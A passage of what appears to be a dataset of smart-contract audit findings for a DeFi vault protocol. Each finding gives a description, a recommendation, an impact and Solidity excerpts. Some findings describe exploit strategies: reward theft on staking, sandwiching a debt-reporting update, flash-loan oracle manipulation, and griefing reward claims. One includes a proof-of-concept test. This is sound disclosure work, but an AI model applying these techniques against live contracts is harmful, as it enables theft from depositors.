turned out to be false due to the bug described in this report.\\n```\\nFile: MainRewarder.sol\\n function stake(address account, uint256 amount) public onlyStakeTracker {\\n _updateReward(account);\\n _stake(account, amount);\\n\\n for (uint256 i = 0; i < extraRewards.length; ++i) {\\n IExtraRewarder(extraRewards[i]).stake(account, amount);\\n }\\n }\\n```\\n\\nWhen the `_updateReward` function is executed, it will compute Bob's earned rewards. It is important to note that at this point, Bob's balance has already been updated to 100 shares in the `stakeTracker` contract, and `userRewardPerTokenPaid[Bob]` is zero.\\nBob's earned reward will be as follows, where $r$ is the rewardPerToken():\\n$$ earned(Bob) = 100\\ {shares \\times (r - 0)} = 100r $$\\nBob immediately accumulated a reward of $100r$ upon staking into the rewarder contract, which is incorrect. Bob could withdraw $100r$ reward tokens that do not belong to him.\\n```\\nFile: AbstractRewarder.sol\\n function _updateReward(address account) internal {\\n uint256 earnedRewards = 0;\\n rewardPerTokenStored = rewardPerToken();\\n lastUpdateBlock = lastBlockRewardApplicable();\\n\\n if (account != address(0)) {\\n earnedRewards = earned(account);\\n rewards[account] = earnedRewards;\\n userRewardPerTokenPaid[account] = rewardPerTokenStored;\\n }\\n\\n emit UserRewardUpdated(account, earnedRewards, rewardPerTokenStored, lastUpdateBlock);\\n }\\n..SNIP..\\n function balanceOf(address account) public view returns (uint256) {\\n return stakeTracker.balanceOf(account);\\n }\\n..SNIP..\\n function earned(address account) public view returns (uint256) {\\n return (balanceOf(account) * (rewardPerToken() - userRewardPerTokenPaid[account]) / 1e18) + rewards[account];\\n }\\n```\\n","Ensure that the balance of the users in the rewarder contract is only incremented after the `_updateReward` function is executed.\\nOne option is to track the balance of the staker and total supply internally within the rewarder contract and avoid reading the states in the `stakeTracker` contract, commonly seen in many reward contracts.\\n```\\nFile: AbstractRewarder.sol\\nfunction balanceOf(address account) public view returns (uint256) {\\n// Remove the line below\\n return stakeTracker.balanceOf(account);\\n// Add the line below\\n return _balances[account];\\n}\\n```\\n\\n```\\nFile: AbstractRewarder.sol\\nfunction _stake(address account, uint256 amount) internal {\\n Errors.verifyNotZero(account, ""account"");\\n Errors.verifyNotZero(amount, ""amount"");\\n \\n// Add the line below\\n _totalSupply // Add the line below\\n= amount\\n// Add the line below\\n _balances[account] // Add the line below\\n= amount\\n\\n emit Staked(account, amount);\\n}\\n```\\n",Loss of reward tokens for the vault shareholders.,"```\\nFile: ERC20.sol\\n function _mint(address account, uint256 amount) internal virtual {\\n..SNIP..\\n _beforeTokenTransfer(address(0), account, amount);\\n\\n _totalSupply += amount;\\n unchecked {\\n // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.\\n _balances[account] += amount;\\n }\\n..SNIP..\\n _afterTokenTransfer(address(0), account, amount);\\n }\\n```\\n" +Differences between actual and cached total assets can be arbitraged,high,"The actual total amount of assets that are owned by a LMPVault on-chain can be derived via the following formula:\\n$$ totalAssets_{actual} = \\sum_{n=1}^{x}debtValue(DV_n) $$\\nWhen `LMPVault.totalAssets()` function is called, it returns the cached total assets of the LMPVault instead.\\n$$ totalAssets_{cached} = totalIdle + totalDebt $$\\n```\\nFile: LMPVault.sol\\n function totalAssets() public view override returns (uint256) {\\n return totalIdle + totalDebt;\\n }\\n```\\n\\nThus, the $totalAssets_{cached}$ will deviate from $totalAssets_{actual}$. This difference could be arbitraged or exploited by malicious users for their gain.\\nCertain actions such as `previewDeposit`, `previewMint`, `previewWithdraw,` and `previewRedeem` functions rely on the $totalAssets_{cached}$ value while other actions such as `_withdraw` and `_calcUserWithdrawSharesToBurn` functions rely on $totalAssets_{actual}$ value.\\nThe following shows one example of the issue.\\nThe `previewDeposit(assets)` function computed the number of shares to be received after depositing a specific amount of assets:\\n$$ shareReceived = \\frac{assets_{deposited}}{totalAssets_{cached}} \\times totalSupply $$\\nAssume that $totalAssets_{cached} < totalAssets_{actual}$, and the values of the variables are as follows:\\n$totalAssets_{cached}$ = 110 WETH\\n$totalAssets_{actual}$ = 115 WETH\\n$totalSupply$ = 100 shares\\nAssume Bob deposited 10 WETH when the total assets are 110 WETH (when $totalAssets_{cached} < totalAssets_{actual}$), he would receive:\\n$$ \\begin{align} shareReceived &= \\frac{10 ETH}{110 ETH} \\times 100e18\\ shares \\ &= 9.090909091e18\\ shares \\end{align} $$\\nIf a user deposited 10 WETH while the total assets are updated to the actual worth of 115 WETH (when $totalAssets_{cached} == totalAssets_{actual}$, they would receive:\\n$$ \\begin{align} shareReceived &= \\frac{10 ETH}{115 ETH} \\times 100e18\\ shares \\ &= 8.695652174e18\\ shares \\ \\end{align} $$\\nTherefore, Bob is receiving more shares than expected.\\nIf Bob redeems all his nine (9) shares after the $totalAssets_{cached}$ has been updated to $totalAssets_{actual}$, he will receive 10.417 WETH back.\\n$$ \\begin{align} assetsReceived &= \\frac{9.090909091e18\\ shares}{(100e18 + 9.090909091e18)\\ shares} \\times (115 + 10)\\ ETH \\ &= \\frac{9.090909091e18\\ shares}{109.090909091e18\\ shares} \\times 125 ETH \\ &= 10.41666667\\ ETH \\end{align} $$\\nBob profits 0.417 WETH simply by arbitraging the difference between the cached and actual values of the total assets. Bob gains is the loss of other vault shareholders.\\nThe $totalAssets_{cached}$ can be updated to $totalAssets_{actual}$ by calling the permissionless `LMPVault.updateDebtReporting` function. Alternatively, one could also perform a sandwich attack against the `LMPVault.updateDebtReporting` function by front-run it to take advantage of the lower-than-expected price or NAV/share, and back-run it to sell the shares when the price or NAV/share rises after the update.\\nOne could also reverse the attack order, where an attacker withdraws at a higher-than-expected price or NAV/share, perform an update on the total assets, and deposit at a lower price or NAV/share.",Consider updating $totalAssets_{cached}$ to $totalAssets_{actual}$ before any withdrawal or deposit to mitigate this issue.,Loss assets for vault shareholders. Attacker gains are the loss of other vault shareholders.,```\\nFile: LMPVault.sol\\n function totalAssets() public view override returns (uint256) {\\n return totalIdle + totalDebt;\\n }\\n```\\n +Incorrect pricing for CurveV2 LP Token,high,"Using the Curve rETH/frxETH pool (0xe7c6e0a739021cdba7aac21b4b728779eef974d9) to illustrate the issue:\\nThe price of the LP token of Curve rETH/frxETH pool can be obtained via the following `lp_price` function:\\n```\\ndef lp_price() -> uint256:\\n """"""\\n Approximate LP token price\\n """"""\\n return 2 * self.virtual_price * self.sqrt_int(self.internal_price_oracle()) / 10**18\\n```\\n\\nThus, the formula to obtain the price of the LP token is as follows:\\n$$ price_{LP} = 2 \\times virtualPrice \\times \\sqrt{internalPriceOracle} $$\\n```\\ndef price_oracle() -> uint256:\\n return self.internal_price_oracle()\\n```\\n\\nThe $internalPriceOracle$ is the price of coins[1](frxETH) with coins[0](rETH) as the quote currency, which means how many rETH (quote) are needed to purchase one frxETH (base).\\n$$ base/quote \\ frxETH/rETH $$\\nDuring pool registration, the `poolInfo.tokenToPrice` is always set to the second coin (coins[1]) as per Line 131 below. In this example, `poolInfo.tokenToPrice` will be set to frxETH token address (coins[1]).\\n```\\nFile: CurveV2CryptoEthOracle.sol\\n function registerPool(address curvePool, address curveLpToken, bool checkReentrancy) external onlyOwner {\\n..SNIP..\\n /**\\n * Curve V2 pools always price second token in `coins` array in first token in `coins` array. This means that\\n * if `coins[0]` is Weth, and `coins[1]` is rEth, the price will be rEth as base and weth as quote. Hence\\n * to get lp price we will always want to use the second token in the array, priced in eth.\\n */\\n lpTokenToPool[lpToken] =\\n PoolData({ pool: curvePool, checkReentrancy: checkReentrancy ? 1 : 0, tokenToPrice: tokens[1] });\\n```\\n\\nNote that `assetPrice` variable below is equivalent to $internalPriceOracle$ in the above formula.\\nWhen fetching the price of the LP token, Line 166 computes the price of frxETH with ETH as the quote currency ($frxETH/ETH$) via the `getPriceInEth` function, and assigns to the `assetPrice` variable.\\nHowever, the $internalPriceOracle$ or `assetPrice` should be $frxETH/rETH$ instead of $frxETH/ETH$. Thus, the price of the LP token computed will be incorrect.\\n```\\nFile: CurveV2CryptoEthOracle.sol\\n function getPriceInEth(address token) external returns (uint256 price) {\\n Errors.verifyNotZero(token, ""token"");\\n\\n PoolData memory poolInfo = lpTokenToPool[token];\\n if (poolInfo.pool == address(0)) revert NotRegistered(token);\\n\\n ICryptoSwapPool cryptoPool = ICryptoSwapPool(poolInfo.pool);\\n\\n // Checking for read only reentrancy scenario.\\n if (poolInfo.checkReentrancy == 1) {\\n // This will fail in a reentrancy situation.\\n cryptoPool.claim_admin_fees();\\n }\\n\\n uint256 virtualPrice = cryptoPool.get_virtual_price();\\n uint256 assetPrice = systemRegistry.rootPriceOracle().getPriceInEth(poolInfo.tokenToPrice);\\n\\n return (2 * virtualPrice * sqrt(assetPrice)) / 10 ** 18;\\n }\\n```\\n",Issue Incorrect pricing for CurveV2 LP Token\\nUpdate the `getPriceInEth` function to ensure that the $internalPriceOracle$ or `assetPrice` return the price of `coins[1]` with `coins[0]` as the quote currency.,"The protocol relies on the oracle to provide accurate pricing for many critical operations, such as determining the debt values of DV, calculators/stats used during the rebalancing process, NAV/shares of the LMPVault, and determining how much assets the users should receive during withdrawal.\\nIncorrect pricing of LP tokens would result in many implications that lead to a loss of assets, such as users withdrawing more or fewer assets than expected due to over/undervalued vaults or strategy allowing an unprofitable rebalance to be executed.","```\\ndef lp_price() -> uint256:\\n """"""\\n Approximate LP token price\\n """"""\\n return 2 * self.virtual_price * self.sqrt_int(self.internal_price_oracle()) / 10**18\\n```\\n" +Incorrect number of shares minted as fee,high,"```\\nFile: LMPVault.sol\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n```\\n\\nAssume that the following states:\\nThe `profit` is 100 WETH\\nThe fee is 20%, so the `fees` will be 20 WETH.\\n`totalSupply` is 100 shares and `totalAssets()` is 1000 WETH\\nLet the number of shares to be minted be $shares2mint$. The current implementation uses the following formula (simplified) to determine $shares2mint$.\\n$$ \\begin{align} shares2mint &= fees \\times \\frac{totalSupply}{totalAsset()} \\ &= 20\\ WETH \\times \\frac{100\\ shares}{1000\\ WETH} \\ &= 2\\ shares \\end{align} $$\\nIn this case, two (2) shares will be minted to the `sink` address as the fee is taken.\\nHowever, the above formula used in the codebase is incorrect. The total cost/value of the newly-minted shares does not correspond to the fee taken. Immediately after the mint, the value of the two (2) shares is worth only 19.60 WETH, which does not correspond to the 20 WETH fee that the `sink` address is entitled to.\\n$$ \\begin{align} value &= 2\\ shares \\times \\frac{1000\\ WETH}{100 + 2\\ shares} \\ &= 2\\ shares \\times 9.8039\\ WETH\\ &= 19.6078\\ WETH \\end{align} $$",The correct formula to compute the number of shares minted as fee should be as follows:\\n$$ \\begin{align} shares2mint &= \\frac{profit \\times performanceFeeBps \\times totalSupply}{(totalAsset() \\times MAX_FEE_BPS) - (performanceFeeBps \\times profit) } \\ &= \\frac{100\\epsilon \\times 2000 \\times 100 shares}{(1000\\epsilon \\times 10000) - (2000 \\times 100\\epsilon)} \\ &= 2.0408163265306122448979591836735\\ shares \\end{align} $$\\nThe following is the proof to show that `2.0408163265306122448979591836735` shares are worth 20 WETH after the mint.\\n$$ \\begin{align} value &= 2.0408163265306122448979591836735\\ shares \\times \\frac{1000\\ WETH}{100 + 2.0408163265306122448979591836735\\ shares} \\ &= 2.0408163265306122448979591836735\\ shares \\times 9.8039\\ WETH\\ &= 20\\ WETH \\end{align} $$,Loss of fee. Fee collection is an integral part of the protocol; thus the loss of fee is considered a High issue.,"```\\nFile: LMPVault.sol\\n profit = (currentNavPerShare - effectiveNavPerShareHighMark) * totalSupply;\\n fees = profit.mulDiv(performanceFeeBps, (MAX_FEE_BPS ** 2), Math.Rounding.Up);\\n if (fees > 0 && sink != address(0)) {\\n // Calculated separate from other mints as normal share mint is round down\\n shares = _convertToShares(fees, Math.Rounding.Up);\\n _mint(sink, shares);\\n emit Deposit(address(this), sink, fees, shares);\\n }\\n```\\n" +Maverick oracle can be manipulated,high,"In the MavEthOracle contract, `getPriceInEth` function utilizes the reserves of the Maverick pool and multiplies them with the external prices of the tokens (obtained from the rootPriceOracle contract) to calculate the total value of the Maverick position.\\n```\\n// Get reserves in boosted position.\\n(uint256 reserveTokenA, uint256 reserveTokenB) = boostedPosition.getReserves();\\n\\n// Get total supply of lp tokens from boosted position.\\nuint256 boostedPositionTotalSupply = boostedPosition.totalSupply();\\n\\nIRootPriceOracle rootPriceOracle = systemRegistry.rootPriceOracle();\\n\\n// Price pool tokens.\\nuint256 priceInEthTokenA = rootPriceOracle.getPriceInEth(address(pool.tokenA()));\\nuint256 priceInEthTokenB = rootPriceOracle.getPriceInEth(address(pool.tokenB()));\\n\\n// Calculate total value of each token in boosted position.\\nuint256 totalBoostedPositionValueTokenA = reserveTokenA * priceInEthTokenA;\\nuint256 totalBoostedPositionValueTokenB = reserveTokenB * priceInEthTokenB;\\n\\n// Return price of lp token in boosted position.\\nreturn (totalBoostedPositionValueTokenA + totalBoostedPositionValueTokenB) / boostedPositionTotalSupply;\\n```\\n\\nHowever, the reserves of a Maverick position can fluctuate when the price of the Maverick pool changes. Therefore, the returned price of this function can be manipulated by swapping a significant amount of tokens into the Maverick pool. An attacker can utilize a flash loan to initiate a swap, thereby changing the price either upwards or downwards, and subsequently swapping back to repay the flash loan.\\nAttacker can decrease the returned price of MavEthOracle by swapping a large amount of the higher value token for the lower value token, and vice versa.\\nHere is a test file that demonstrates how the price of the MavEthOracle contract can be manipulated by swapping to change the reserves.",Use another calculation for Maverick oracle,"There are multiple impacts that an attacker can exploit by manipulating the price of MavEthOracle:\\nDecreasing the oracle price to lower the totalDebt of LMPVault, in order to receive more LMPVault shares.\\nIncreasing the oracle price to raise the totalDebt of LMPVault, in order to receive more withdrawn tokens.\\nManipulating the results of the Stats contracts to cause miscalculations for the protocol.","```\\n// Get reserves in boosted position.\\n(uint256 reserveTokenA, uint256 reserveTokenB) = boostedPosition.getReserves();\\n\\n// Get total supply of lp tokens from boosted position.\\nuint256 boostedPositionTotalSupply = boostedPosition.totalSupply();\\n\\nIRootPriceOracle rootPriceOracle = systemRegistry.rootPriceOracle();\\n\\n// Price pool tokens.\\nuint256 priceInEthTokenA = rootPriceOracle.getPriceInEth(address(pool.tokenA()));\\nuint256 priceInEthTokenB = rootPriceOracle.getPriceInEth(address(pool.tokenB()));\\n\\n// Calculate total value of each token in boosted position.\\nuint256 totalBoostedPositionValueTokenA = reserveTokenA * priceInEthTokenA;\\nuint256 totalBoostedPositionValueTokenB = reserveTokenB * priceInEthTokenB;\\n\\n// Return price of lp token in boosted position.\\nreturn (totalBoostedPositionValueTokenA + totalBoostedPositionValueTokenB) / boostedPositionTotalSupply;\\n```\\n" +Aura/Convex rewards are stuck after DOS,high,"Anyone can claim Convex rewards for any account.\\n```\\nfunction getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n}\\n```\\n\\nIn ConvexRewardsAdapter, the rewards are accounted for by using balanceBefore/after.\\n```\\nfunction _claimRewards(\\n address gauge,\\n address defaultToken,\\n address sendTo\\n) internal returns (uint256[] memory amounts, address[] memory tokens) {\\n\\n uint256[] memory balancesBefore = new uint256[](totalLength);\\n uint256[] memory amountsClaimed = new uint256[](totalLength);\\n// rest of code\\n\\n for (uint256 i = 0; i < totalLength; ++i) {\\n uint256 balance = 0;\\n // Same check for ""stash tokens""\\n if (IERC20(rewardTokens[i]).totalSupply() > 0) {\\n balance = IERC20(rewardTokens[i]).balanceOf(account);\\n }\\n\\n amountsClaimed[i] = balance - balancesBefore[i];\\n\\n return (amountsClaimed, rewardTokens);\\n```\\n\\nAdversary can call the external convex contract's `getReward(tokemakContract)`. After this, the reward tokens are transferred to Tokemak without an accounting hook.\\nNow, when Tokemak calls claimRewards, then no new rewards are transferred, because the attacker already transferred them. `amountsClaimed` will be 0.",Don't use balanceBefore/After. You could consider using `balanceOf(address(this))` after claiming to see the full amount of tokens in the contract. This assumes that only the specific rewards balance is in the contract.,Rewards are stuck in the LiquidationRow contract and not queued to the MainRewarder.,"```\\nfunction getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n}\\n```\\n" +`LMPVault._withdraw()` can revert due to an arithmetic underflow,medium,"Inside the `_withdraw()` function, the `maxAssetsToPull` argument value of `_calcUserWithdrawSharesToBurn()` is calculated to be equal to `info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled)`. However, the `_withdraw()` function only halts its loop when `info.totalAssetsPulled >= info.totalAssetsToPull`. This can lead to a situation where `info.debtDecrease >= info.totalAssetsToPull`. Consequently, when calculating `info.totalAssetsToPull - Math.max(info.debtDecrease, info.totalAssetsPulled)` for the next destination vault in the loop, an underflow occurs and triggers a contract revert.\\nTo illustrate this vulnerability, consider the following scenario:\\n```\\n function test_revert_underflow() public {\\n _accessController.grantRole(Roles.SOLVER_ROLE, address(this));\\n _accessController.grantRole(Roles.LMP_FEE_SETTER_ROLE, address(this));\\n\\n // User is going to deposit 1500 asset\\n _asset.mint(address(this), 1500);\\n _asset.approve(address(_lmpVault), 1500);\\n _lmpVault.deposit(1500, address(this));\\n\\n // Deployed 700 asset to DV1\\n _underlyerOne.mint(address(this), 700);\\n _underlyerOne.approve(address(_lmpVault), 700);\\n _lmpVault.rebalance(\\n address(_destVaultOne),\\n address(_underlyerOne), // tokenIn\\n 700,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 700\\n );\\n\\n // Deploy 600 asset to DV2\\n _underlyerTwo.mint(address(this), 600);\\n _underlyerTwo.approve(address(_lmpVault), 600);\\n _lmpVault.rebalance(\\n address(_destVaultTwo),\\n address(_underlyerTwo), // tokenIn\\n 600,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 600\\n );\\n\\n // Deployed 200 asset to DV3\\n _underlyerThree.mint(address(this), 200);\\n _underlyerThree.approve(address(_lmpVault), 200);\\n _lmpVault.rebalance(\\n address(_destVaultThree),\\n address(_underlyerThree), // tokenIn\\n 200,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 200\\n );\\n\\n // Drop the price of DV2 to 70% of original, so that 600 we transferred out is now only worth 420\\n _mockRootPrice(address(_underlyerTwo), 7e17);\\n\\n // Revert because of an arithmetic underflow\\n vm.expectRevert();\\n uint256 assets = _lmpVault.redeem(1000, address(this), address(this));\\n }\\n```\\n","Issue `LMPVault._withdraw()` can revert due to an arithmetic underflow\\nTo mitigate this vulnerability, it is recommended to break the loop within the `_withdraw()` function if `Math.max(info.debtDecrease, info.totalAssetsPulled) >= info.totalAssetsToPull`\\n```\\n if (\\n Math.max(info.debtDecrease, info.totalAssetsPulled) >\\n info.totalAssetsToPull\\n ) {\\n info.idleIncrease =\\n Math.max(info.debtDecrease, info.totalAssetsPulled) -\\n info.totalAssetsToPull;\\n if (info.totalAssetsPulled >= info.debtDecrease) {\\n info.totalAssetsPulled = info.totalAssetsToPull;\\n }\\n break;\\n }\\n\\n // No need to keep going if we have the amount we're looking for\\n // Any overage is accounted for above. Anything lower and we need to keep going\\n // slither-disable-next-line incorrect-equality\\n if (\\n Math.max(info.debtDecrease, info.totalAssetsPulled) ==\\n info.totalAssetsToPull\\n ) {\\n break;\\n }\\n```\\n","The vulnerability can result in the contract reverting due to an underflow, disrupting the functionality of the contract. Users who try to withdraw assets from the LMPVault may encounter transaction failures and be unable to withdraw their assets.","```\\n function test_revert_underflow() public {\\n _accessController.grantRole(Roles.SOLVER_ROLE, address(this));\\n _accessController.grantRole(Roles.LMP_FEE_SETTER_ROLE, address(this));\\n\\n // User is going to deposit 1500 asset\\n _asset.mint(address(this), 1500);\\n _asset.approve(address(_lmpVault), 1500);\\n _lmpVault.deposit(1500, address(this));\\n\\n // Deployed 700 asset to DV1\\n _underlyerOne.mint(address(this), 700);\\n _underlyerOne.approve(address(_lmpVault), 700);\\n _lmpVault.rebalance(\\n address(_destVaultOne),\\n address(_underlyerOne), // tokenIn\\n 700,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 700\\n );\\n\\n // Deploy 600 asset to DV2\\n _underlyerTwo.mint(address(this), 600);\\n _underlyerTwo.approve(address(_lmpVault), 600);\\n _lmpVault.rebalance(\\n address(_destVaultTwo),\\n address(_underlyerTwo), // tokenIn\\n 600,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 600\\n );\\n\\n // Deployed 200 asset to DV3\\n _underlyerThree.mint(address(this), 200);\\n _underlyerThree.approve(address(_lmpVault), 200);\\n _lmpVault.rebalance(\\n address(_destVaultThree),\\n address(_underlyerThree), // tokenIn\\n 200,\\n address(0), // destinationOut, none when sending out baseAsset\\n address(_asset), // baseAsset, tokenOut\\n 200\\n );\\n\\n // Drop the price of DV2 to 70% of original, so that 600 we transferred out is now only worth 420\\n _mockRootPrice(address(_underlyerTwo), 7e17);\\n\\n // Revert because of an arithmetic underflow\\n vm.expectRevert();\\n uint256 assets = _lmpVault.redeem(1000, address(this), address(this));\\n }\\n```\\n" +Unable to withdraw extra rewards,medium,"Suppose Bob only has 9999 Wei TOKE tokens as main rewards and 100e18 DAI as extra rewards in this account.\\nWhen attempting to get the rewards, the code will always get the main rewards, followed by the extra rewards, as shown below.\\n```\\nFile: MainRewarder.sol\\n function _processRewards(address account, bool claimExtras) internal {\\n _getReward(account);\\n\\n //also get rewards from linked rewards\\n if (claimExtras) {\\n for (uint256 i = 0; i < extraRewards.length; ++i) {\\n IExtraRewarder(extraRewards[i]).getReward(account);\\n }\\n }\\n }\\n```\\n\\nIf the main reward is TOKE, they will be staked to the `GPToke` at Line 376 below.\\n```\\nFile: AbstractRewarder.sol\\n function _getReward(address account) internal {\\n Errors.verifyNotZero(account, ""account"");\\n\\n uint256 reward = earned(account);\\n (IGPToke gpToke, address tokeAddress) = (systemRegistry.gpToke(), address(systemRegistry.toke()));\\n\\n // slither-disable-next-line incorrect-equality\\n if (reward == 0) return;\\n\\n rewards[account] = 0;\\n emit RewardPaid(account, reward);\\n\\n // if NOT toke, or staking is turned off (by duration = 0), just send reward back\\n if (rewardToken != tokeAddress || tokeLockDuration == 0) {\\n IERC20(rewardToken).safeTransfer(account, reward);\\n } else {\\n // authorize gpToke to get our reward Toke\\n // slither-disable-next-line unused-return\\n IERC20(address(tokeAddress)).approve(address(gpToke), reward);\\n\\n // stake Toke\\n gpToke.stake(reward, tokeLockDuration, account);\\n }\\n }\\n```\\n\\nHowever, if the staked amount is less than the minimum stake amount (MIN_STAKE_AMOUNT), the function will revert.\\n```\\nFile: GPToke.sol\\n uint256 public constant MIN_STAKE_AMOUNT = 10_000;\\n..SNIP..\\n function _stake(uint256 amount, uint256 duration, address to) internal whenNotPaused {\\n //\\n // validation checks\\n //\\n if (to == address(0)) revert ZeroAddress();\\n if (amount < MIN_STAKE_AMOUNT) revert StakingAmountInsufficient();\\n if (amount > MAX_STAKE_AMOUNT) revert StakingAmountExceeded();\\n```\\n\\nIn this case, Bob will not be able to redeem his 100 DAI reward when processing the reward. The code will always attempt to stake 9999 Wei Toke and revert because it fails to meet the minimum stake amount.","To remediate the issue, consider collecting TOKE and staking it to the `GPToke` contract only if it meets the minimum stake amount.\\n```\\nfunction _getReward(address account) internal {\\n Errors.verifyNotZero(account, ""account"");\\n\\n uint256 reward = earned(account);\\n (IGPToke gpToke, address tokeAddress) = (systemRegistry.gpToke(), address(systemRegistry.toke()));\\n\\n // slither// Remove the line below\\ndisable// Remove the line below\\nnext// Remove the line below\\nline incorrect// Remove the line below\\nequality\\n if (reward == 0) return;\\n\\n// Remove the line below\\n rewards[account] = 0;\\n// Remove the line below\\n emit RewardPaid(account, reward);\\n\\n // if NOT toke, or staking is turned off (by duration = 0), just send reward back\\n if (rewardToken != tokeAddress || tokeLockDuration == 0) {\\n// Add the line below\\n rewards[account] = 0;\\n// Add the line below\\n emit RewardPaid(account, reward);\\n IERC20(rewardToken).safeTransfer(account, reward);\\n } else {\\n// Add the line below\\n if (reward >= MIN_STAKE_AMOUNT) {\\n// Add the line below\\n rewards[account] = 0;\\n// Add the line below\\n emit RewardPaid(account, reward);\\n// Add the line below\\n\\n // authorize gpToke to get our reward Toke\\n // slither// Remove the line below\\ndisable// Remove the line below\\nnext// Remove the line below\\nline unused// Remove the line below\\nreturn\\n IERC20(address(tokeAddress)).approve(address(gpToke), reward);\\n\\n // stake Toke\\n gpToke.stake(reward, tokeLockDuration, account);\\n// Add the line below\\n }\\n }\\n}\\n```\\n","There is no guarantee that the users' TOKE rewards will always be larger than `MIN_STAKE_AMOUNT` as it depends on various factors such as the following:\\nThe number of vault shares they hold. If they hold little shares, their TOKE reward will be insignificant\\nIf their holding in the vault is small compared to the others and the entire vault, the TOKE reward they received will be insignificant\\nThe timing they join the vault. If they join after the reward is distributed, they will not be entitled to it.\\nAs such, the affected users will not be able to withdraw their extra rewards, and they will be stuck in the contract.","```\\nFile: MainRewarder.sol\\n function _processRewards(address account, bool claimExtras) internal {\\n _getReward(account);\\n\\n //also get rewards from linked rewards\\n if (claimExtras) {\\n for (uint256 i = 0; i < extraRewards.length; ++i) {\\n IExtraRewarder(extraRewards[i]).getReward(account);\\n }\\n }\\n }\\n```\\n" +Malicious or compromised admin of certain LSTs could manipulate the price,medium,"Important Per the contest detail page, admins of the external protocols are marked as ""Restricted"" (Not Trusted). This means that any potential issues arising from the external protocol's admin actions (maliciously or accidentally) are considered valid in the context of this audit.\\nQ: Are the admins of the protocols your contracts integrate with (if any) TRUSTED or RESTRICTED?\\nRESTRICTED\\nNote This issue also applies to other support Liquid Staking Tokens (LSTs) where the admin could upgrade the token contract code. Those examples are omitted for brevity, as the write-up and mitigation are the same and would duplicate this issue.\\nPer the contest detail page, the protocol will hold and interact with the Swell ETH (swETH).\\nLiquid Staking Tokens\\nswETH: 0xf951E335afb289353dc249e82926178EaC7DEd78\\nUpon inspection of the swETH on-chain contract, it was found that it is a Transparent Upgradeable Proxy. This means that the admin of Swell protocol could upgrade the contracts.\\nTokemak relies on the `swEth.swETHToETHRate()` function to determine the price of the swETH LST within the protocol. Thus, a malicious or compromised admin of Swell could upgrade the contract to have the `swETHToETHRate` function return an extremely high to manipulate the total values of the vaults, resulting in users being able to withdraw more assets than expected, thus draining the LMPVault.\\n```\\nFile: SwEthEthOracle.sol\\n function getPriceInEth(address token) external view returns (uint256 price) {\\n // Prevents incorrect config at root level.\\n if (token != address(swEth)) revert Errors.InvalidToken(token);\\n\\n // Returns in 1e18 precision.\\n price = swEth.swETHToETHRate();\\n }\\n```\\n","The protocol team should be aware of the above-mentioned risks and consider implementing additional controls to reduce the risks.\\nReview each of the supported LSTs and determine how much power the Liquid staking protocol team/admin has over its tokens.\\nFor LSTs that are more centralized (e.g., Liquid staking protocol team could update the token contracts or have the ability to update the exchange rate/price to an arbitrary value without any limit), those LSTs should be subjected to additional controls or monitoring, such as implementing some form of circuit breakers if the price deviates beyond a reasonable percentage to reduce the negative impact to Tokemak if it happens.",Loss of assets in the scenario as described above.,```\\nFile: SwEthEthOracle.sol\\n function getPriceInEth(address token) external view returns (uint256 price) {\\n // Prevents incorrect config at root level.\\n if (token != address(swEth)) revert Errors.InvalidToken(token);\\n\\n // Returns in 1e18 precision.\\n price = swEth.swETHToETHRate();\\n }\\n```\\n +`previewRedeem` and `redeem` functions deviate from the ERC4626 specification,medium,"Important The contest page explicitly mentioned that the `LMPVault` must conform with the ERC4626. Thus, issues related to EIP compliance should be considered valid in the context of this audit.\\nQ: Is the code/contract expected to comply with any EIPs? Are there specific assumptions around adhering to those EIPs that Watsons should be aware of?\\nsrc/vault/LMPVault.sol should be 4626 compatible\\nLet the value returned by `previewRedeem` function be $asset_{preview}$ and the actual number of assets obtained from calling the `redeem` function be $asset_{actual}$.\\nThe following specification of `previewRedeem` function is taken from ERC4626 specification:\\nAllows an on-chain or off-chain user to simulate the effects of their redeemption at the current block, given current on-chain conditions.\\nMUST return as close to and no more than the exact amount of `assets` that would be withdrawn in a `redeem` call in the same transaction. I.e. `redeem` should return the same or more `assets` as `previewRedeem` if called in the same transaction.\\nIt mentioned that the `redeem` should return the same or more `assets` as `previewRedeem` if called in the same transaction, which means that it must always be $asset_{preview} \\le asset_{actual}$.\\nHowever, it is possible that the `redeem` function might return fewer assets than the number of assets previewed by the `previewRedeem` ($asset_{preview} > asset_{actual}$), thus it does not conform to the specification.\\n```\\nFile: LMPVault.sol\\n function redeem(\\n uint256 shares,\\n address receiver,\\n address owner\\n ) public virtual override nonReentrant noNavDecrease ensureNoNavOps returns (uint256 assets) {\\n uint256 maxShares = maxRedeem(owner);\\n if (shares > maxShares) {\\n revert ERC4626ExceededMaxRedeem(owner, shares, maxShares);\\n }\\n uint256 possibleAssets 